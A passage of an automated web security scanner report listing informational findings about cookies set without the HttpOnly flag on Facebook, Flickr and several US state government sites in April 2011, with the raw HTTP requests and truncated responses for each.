Set-Cookie: exp_last_activity=1304181121; expires=Sun, 29-Apr-2012 12:32:01 GMT; path=/
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fsite%2Findex%2F%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 11187

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>
<title>e-Learning North Carol
...[SNIP]...

14.509. http://www.facebook.com/TeamHaslam  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /TeamHaslam

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /TeamHaslam HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: lsd=Pi-Op; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.137.9.128
Connection: close
Date: Sat, 30 Apr 2011 12:32:13 GMT
Content-Length: 135590

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

14.510. http://www.facebook.com/WSDOL  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /WSDOL

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /WSDOL HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: lsd=IdulS; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.231.103
Connection: close
Date: Sat, 30 Apr 2011 12:32:14 GMT
Content-Length: 165238

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

14.511. http://www.facebook.com/note.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /note.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /note.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: lsd=DNT-Q; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.234.113
Connection: close
Date: Sat, 30 Apr 2011 12:32:06 GMT
Content-Length: 13344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

14.512. http://www.facebook.com/ohiodivisionofwatercraft  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /ohiodivisionofwatercraft

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ohiodivisionofwatercraft HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: lsd=-xzbm; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.238.103
Connection: close
Date: Sat, 30 Apr 2011 12:32:07 GMT
Content-Length: 45188

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

14.513. http://www.facebook.com/pages/Austin-TX/Texasgov/117263931626845  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Austin-TX/Texasgov/117263931626845

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/Austin-TX/Texasgov/117263931626845 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/pages/Texasgov/117263931626845
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: lsd=rq3rc; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.248.121
Connection: close
Date: Sat, 30 Apr 2011 12:32:08 GMT
Content-Length: 0


14.514. http://www.facebook.com/pages/Social-Circle-GA/Wildlife-Resources-Division-GADNR/101012503387  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Social-Circle-GA/Wildlife-Resources-Division-GADNR/101012503387

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/Social-Circle-GA/Wildlife-Resources-Division-GADNR/101012503387 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/WildlifeResourcesDivisionGADNR
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: lsd=0Ak4_; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.137.11.117
Connection: close
Date: Sat, 30 Apr 2011 12:32:08 GMT
Content-Length: 0


14.515. http://www.facebook.com/pages/Trenton-NJ/NJ-Department-of-Education-Family-and-Community-Relations/122601104423680  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Trenton-NJ/NJ-Department-of-Education-Family-and-Community-Relations/122601104423680

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/Trenton-NJ/NJ-Department-of-Education-Family-and-Community-Relations/122601104423680 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/pages/NJ-Department-of-Education-Family-and-Community-Relations/122601104423680
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: lsd=ondUt; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.229.123
Connection: close
Date: Sat, 30 Apr 2011 12:32:09 GMT
Content-Length: 0


14.516. http://www.facebook.com/photo.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /photo.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /photo.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: lsd=9bvPF; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fphoto.php; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fphoto.php; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.206.101
Connection: close
Date: Sat, 30 Apr 2011 12:32:11 GMT
Content-Length: 11367

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

14.517. http://www.facebook.com/share.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /share.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /share.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: lsd=cFyQm; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fshare.php; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fshare.php; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.200.118
Connection: close
Date: Sat, 30 Apr 2011 12:32:12 GMT
Content-Length: 10404

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

14.518. http://www.facebook.com/video/video.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /video/video.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /video/video.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/video/
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: lsd=SpXAc; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.247.111
Connection: close
Date: Sat, 30 Apr 2011 12:32:13 GMT
Content-Length: 0


14.519. http://www.flickr.com/groups_join.gne  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /groups_join.gne

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /groups_join.gne HTTP/1.1
Host: www.flickr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 30 Apr 2011 12:32:14 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: BX=6sq0b5h6ro0ae&b=3&s=p3; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.flickr.com
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Tue, 29-Apr-2014 12:32:14 GMT; path=/; domain=.flickr.com
location: /signin/?acf=%2Fgroups_join.gne
X-Served-By: www133.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=ISO-8859-1


14.520. http://www.governor.ct.gov/malloy/cwp/view.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.governor.ct.gov
Path:   /malloy/cwp/view.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /malloy/cwp/view.asp HTTP/1.1
Host: www.governor.ct.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Sat, 30 Apr 2011 12:36:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: browse.asp?A=3
Content-Length: 135
Content-Type: text/html
Set-Cookie: malloy=LoginJumpBackTo=%2Fmalloy%2Fcwp%2Fview%2Easp%3F&AA=False&UA=Guest&AN=0&Q=CF83CBC7&TC=17120&CA=CF83CBC7&II=&TU=CF83CBC7&FN=Guest&ILO=False&rn=True&NB=False&F=CE83CBC6&SSL=False&EA=&SA=False; domain=www.governor.ct.gov; path=/malloy
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="browse.asp?A=3">here</a>.</body>

14.521. http://www.governor.ny.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.governor.ny.gov
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.governor.ny.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=69751567.1304117377.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69751567.1583628114.1304117377.1304117377.1304117377.1; __utmc=69751567; __utmb=69751567.2.10.1304117377

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 22:50:17 GMT
Server: Apache
Last-Modified: Fri, 29 Apr 2011 22:02:42 GMT
ETag: "23d8f4d-94ef-4a215d536e480"
Accept-Ranges: bytes
Content-Length: 38127
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: webpool=webpool_web01; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr">

<head>
<me
...[SNIP]...

14.522. https://www.humanservices.state.pa.us/Compass.Web/CMHOM.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.humanservices.state.pa.us
Path:   /Compass.Web/CMHOM.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Compass.Web/CMHOM.aspx HTTP/1.1
Host: www.humanservices.state.pa.us
Connection: keep-alive
Referer: http://www.budget.state.pa.us/portal/server.pt/community/current_and_proposed_commonwealth_budgets/4566
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=yr3x3j55tjb3vof0ovmzf2zt

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:41:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: LangCode=EN; path=/
Set-Cookie: Image=HomePagePhoto_5.jpg; path=/
Set-Cookie: HTTP_TARGET=https://www.humanservices.state.pa.us/compass.web/MenuItems/CPSystemCompatibility.aspx; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 52074


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
COMPASS
</tit
...[SNIP]...

14.523. http://www.ieaddons.com/en/ie8slice/wsUpdate.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ieaddons.com
Path:   /en/ie8slice/wsUpdate.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/ie8slice/wsUpdate.aspx HTTP/1.1
Host: www.ieaddons.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:38:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=k4q1byzyig0xcsnh14bvew55; path=/; HttpOnly
Set-Cookie: ie8_webslice_anonymous=f5f20052-0bd6-416e-bd93-b69b3dd1a3db; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 240


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>

</title><
...[SNIP]...

14.524. http://www.illinoisfilm.biz/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.illinoisfilm.biz
Path:   /index.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /index.php HTTP/1.1
Host: www.illinoisfilm.biz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Date: Sat, 30 Apr 2011 12:38:56 GMT
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Pragma: no-cache
Connection: close
Set-Cookie: cfbfcfe1eac5733fe78ac3c1237872be=1uj6ep85a77kl0u2hl4e9ri9j3; path=/
Set-Cookie: X-Mapping-goahfekk=7D6655321FCF215E6933A449ECD763A0; path=/
Last-Modified: Sat, 30 Apr 2011 12:38:58 GMT
Content-Length: 12567

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<he
...[SNIP]...

14.525. http://www.in.gov/ai/appfiles/cms/alert.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /ai/appfiles/cms/alert.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ai/appfiles/cms/alert.css HTTP/1.1
Host: www.in.gov
Proxy-Connection: keep-alive
Referer: http://www.in.gov/ai/errors/dwd_404.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1132785758-1304175835376; __utmz=58136434.1304175835.2.2.utmcsr=workoneworks.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=58136434.288860735.1304126856.1304126856.1304175835.2; __utmc=58136434; __utmb=58136434.1.10.1304175835; BIGipServerwww.IN.gov-http=1916078090.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 15:03:55 GMT
Server: Apache
Last-Modified: Fri, 09 Jul 2010 12:02:50 GMT
ETag: "518f37-34-48af32e944e80"
Accept-Ranges: bytes
Content-Length: 52
Content-Type: text/css
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 15:04:55 GMT; path=/

#alert {display: none;}
#alerttest {display: none;}

14.526. http://www.in.gov/ai/appfiles/oss/oss_logos/bmv_oss.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /ai/appfiles/oss/oss_logos/bmv_oss.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ai/appfiles/oss/oss_logos/bmv_oss.jpg HTTP/1.1
Host: www.in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/core/online_services.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1; __utmc=58136434; __utmb=58136434.2.10.1304126856

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:35:40 GMT
Server: Apache
Last-Modified: Wed, 28 Apr 2010 17:45:22 GMT
ETag: "4a6b7a-2690-4854f92fff080"
Accept-Ranges: bytes
Content-Length: 9872
Content-Type: image/jpeg
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 01:36:40 GMT; path=/

......JFIF.....d.d......Ducky.......d......Adobe.d.................................................................................................................................................d.d..
...[SNIP]...

14.527. http://www.in.gov/ai/errors/dwd_404.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /ai/errors/dwd_404.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ai/errors/dwd_404.html HTTP/1.1
Host: www.in.gov
Proxy-Connection: keep-alive
Referer: http://www.in.gov/dwd/WorkOne//?513f2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1; BIGipServerwww.IN.gov-http=1916078090.20480.0000

Response

HTTP/1.1 200 OK
